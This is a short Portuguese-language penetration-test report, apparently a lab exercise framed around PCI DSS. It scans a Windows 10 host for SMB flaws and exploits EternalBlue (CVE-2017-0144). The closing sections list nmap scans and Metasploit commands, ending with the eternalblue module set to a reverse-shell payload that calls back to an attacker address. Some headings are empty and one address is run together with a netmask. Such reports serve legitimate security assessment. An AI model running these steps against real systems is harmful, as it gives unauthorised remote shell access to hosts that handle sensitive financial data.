
Este relatório descreve um engajamento VAPT estruturado focado em conformidade com PCI DSS, enumeração de serviço SMB e exploração do CVE-2017-0144 (EternalBlue) em uma máquina Windows 10 dentro de uma infraestrutura voltada para finanças.
As instituições financeiras enfrentam alguns dos requisitos de conformidade mais rigorosos no espaço de segurança cibernética. Com dados sensíveis de clientes e informações de titulares de cartão em jogo, configurações incorretas de segurança podem levar a violações catastróficas. Esta simulação de VAPT foi realizada para avaliar a postura de segurança de um sistema endpoint baseado em Windows 10 sob a perspectiva de conformidade com PCI DSS, além de identificar e explorar vulnerabilidades conhecidas em serviços SMB expostos.
A simulação abrange múltiplas etapas — desde reconhecimento e varredura de vulnerabilidades usando Nessus até exploração real via Metasploit. O relatório enfatiza ainda a importância do hardening de endpoints, gerenciamento de patches, aplicação de firewalls e alinhamento com PCI DSS para manter a integridade de redes financeiras.
Preparado por: Aditya Bhatt
Cargo: Analista VAPT | Profissional de Segurança Cibernética
Contato: [email protected] | +91-9818993884
Este relatório apresenta os resultados de um teste de penetração conduzido em um endpoint Windows 10 que supostamente lida com dados financeiros e transações com cartão de crédito. O objetivo foi validar as implementações de controle do PCI DSS e identificar potenciais vetores de ataque que poderiam comprometer os dados dos titulares de cartão.
Usando Nessus, o host foi descoberto como vulnerável ao CVE-2017-0144 (EternalBlue) — uma vulnerabilidade crítica do SMB. O framework Metasploit foi então utilizado para explorar essa falha e obter acesso remoto não autorizado a um shell. Este relatório destaca a importância do gerenciamento oportuno de patches e do hardening de serviços de rede para evitar violações de dados em sistemas financeiros.
Seis objetivos principais e doze requisitos do PCI DSS foram revisados. Os princípios-chave incluem:
Sistema Alvo:
10.10.195.105255.0.0.0Ferramentas Utilizadas:
Comandos Principais:
nmap -sn 10.10.195.105
nmap -sV -p445 10.10.195.105
nmap -F 10.10.195.105
Scanner:
Tentativa de Varredura Nessus:
Tentativa de Varredura Metasploit:
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
Módulo de Exploração:
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit